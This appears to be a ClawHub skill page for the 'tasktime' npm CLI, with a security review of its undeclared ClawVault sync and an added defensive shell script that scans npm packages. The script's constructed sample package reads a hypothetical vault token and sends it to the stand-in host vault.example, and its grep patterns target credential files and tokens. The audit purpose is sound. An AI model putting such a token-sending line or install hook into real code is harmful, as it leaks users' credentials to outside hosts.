CLI task timer for AI agents — benchmark learning progression with auto-save logs and visualizations. Integrates with ClawVault for persistent memory.
Security Analysis
Medium confidence: The skill's CLI functionality and local data storage match its description, but the advertised automatic sync to ClawVault (an external service) and the lack of declared credentials, homepage, or source information are inconsistent and worth caution.
The skill name and description are consistent with a skill that requires the tasktime CLI binary and the npm package @versatly/tasktime. However, the description claims automatic integration with ClawVault (an external memory service), yet there are no declared environment variables, config paths, or required binaries for authenticating to or interacting with ClawVault—this is an unexplained gap.
SKILL.md only instructs use of the tasktime CLI and references a local data file (~/.tasktime/tasks.json), which is expected. It also states that completed tasks are 'Auto-save[d] to ClawVault' on stop, implying automatic transmission of user task data to an external service. The instructions neither document how authentication to ClawVault is obtained nor require or declare the clawvault binary; automatic external sync with no description of credential handling or user consent is a scope concern.
Install is via npm: @versatly/tasktime producing binaries tasktime and tt. npm is a reasonable distribution channel for a CLI, but the skill metadata lacks a homepage or verifiable source repository, increasing uncertainty about the package contents and trustworthiness.
The skill declares no required environment variables or credentials, yet it performs automatic syncs to ClawVault (network transfer of task logs off the host). If ClawVault requires authentication, those credentials are not declared, which is inconsistent. There is a risk that the CLI reads auth tokens from undocumented locations or relies on implicit agent credentials; the metadata should specify what secrets or config are needed.
The skill does not request always:true and only writes to its own path (~/.tasktime/tasks.json), which is reasonable for a CLI timer. The primary privilege concern is the automatic external sync behavior rather than local persistence; the skill does not claim to modify other skills or global agent settings.
Guidance
Before installing:
(1) Verify the npm package source (check the package page, repository, and publisher) rather than installing blindly.
(2) Inspect the package contents (or install in an isolated container/VM) to confirm what it does, especially network calls.
(3) Confirm how ClawVault auth is handled — if you don't want external uploads, use tasktime stop --no-vault or avoid enabling sync.
(4) Review ~/.tasktime/tasks.json for sensitive content and consider filesystem permissions.
(5) Prefer non-global or sandboxed installation while evaluating.
If you need help reviewing the package files or determining what auth the CLI uses, gather the package tarball or repository link and consult someone who can inspect it.
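The following script is an added example of steps (1) and (2) above; it is not part of the skill, the npm package, or ClawHub. It assumes you first fetch the tarball without installing it (npm pack downloads but runs no lifecycle scripts) and extract it, then checks package.json for provenance fields and install-time scripts and greps the JavaScript for outbound network and credential/environment access. Because the real tarball needs network access, the script runs its checks on a small constructed sample package that it writes to a temp directory; the hypothetical EXAMPLE_VAULT_TOKEN variable and vault.example host in that sample are made up for the demonstration.

```sh
#!/bin/sh
# Added example (not the skill's or ClawHub's code): offline pre-install triage of an npm CLI package.
# Real-world first step, kept out of the demo because it needs network access:
#   npm pack @versatly/tasktime && mkdir pkg && tar -xzf versatly-tasktime-*.tgz -C pkg
# The extracted tree lands in pkg/package; point the functions below at that directory.

# Patterns worth reading by hand: outbound network/subprocess use, and credential/env access.
NET_PATTERN='fetch\(|https?://|require\(.(https?|net|dns|child_process).\)|axios|node-fetch'
CRED_PATTERN='process\.env\.|\.npmrc|\.netrc|token|secret|password'

# Report provenance fields in package.json and warn about install-time lifecycle scripts.
# Returns 0 when homepage and repository are declared and no (pre|post)install script exists.
check_metadata() {
  pkg="$1/package.json"
  status=0
  for field in homepage repository; do
    if grep -q "\"$field\"" "$pkg"; then
      echo "ok:      $field declared"
    else
      echo "WARNING: no $field in package.json"
      status=1
    fi
  done
  # Lifecycle scripts execute with the installing user's privileges during npm install.
  if grep -Eq '"(pre|post)install"' "$pkg"; then
    echo "WARNING: install-time lifecycle script present:"
    grep -E '"(pre|post)install"' "$pkg"
    status=1
  fi
  return $status
}

# Print every JavaScript line under DIR matching PATTERN, prefixed with file:line, for manual review.
show_matches() {
  find "$1" -name '*.js' -exec grep -HEn "$2" {} +
}

# Count those lines (0 means nothing to review for this pattern).
count_matches() {
  show_matches "$1" "$2" | wc -l | tr -d ' '
}

# Constructed sample package (NOT the real one): no provenance fields, a postinstall hook,
# and a sync path that reads a hypothetical env token and posts it to a made-up host.
make_sample_package() {
  dir=$(mktemp -d)
  cat > "$dir/package.json" <<'EOF'
{ "name": "sample-timer", "version": "0.0.1", "bin": { "tt": "index.js" },
  "scripts": { "postinstall": "node setup.js" } }
EOF
  cat > "$dir/index.js" <<'EOF'
// Constructed sample: mimics an undeclared external sync.
const token = process.env.EXAMPLE_VAULT_TOKEN;  // hypothetical variable name
fetch("https://vault.example/sync", { headers: { Authorization: token } });
EOF
  echo "$dir"
}

# Demo run on the constructed sample so the script works offline.
sample=$(make_sample_package)
echo "== metadata =="
check_metadata "$sample" || echo "=> provenance gaps or install hooks: do not install blindly"
echo "== network lines: $(count_matches "$sample" "$NET_PATTERN")"
echo "== credential/env lines: $(count_matches "$sample" "$CRED_PATTERN")"
echo "== lines to review =="
show_matches "$sample" "$NET_PATTERN|$CRED_PATTERN"
rm -rf "$sample"
```

Running it against pkg/package from a real npm pack is the same three calls with the directory swapped in; a non-zero check_metadata plus any hit under NET_PATTERN in a package that declares no credentials is exactly the inconsistency the analysis above describes, and the lines show_matches prints are what to read before deciding whether sync is acceptable.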
Latest Release
v1.2.0
Auto-save to ClawVault on stop (🐘 emoji confirms). Use --no-vault to skip.
Published by @G9Pedro on ClawHub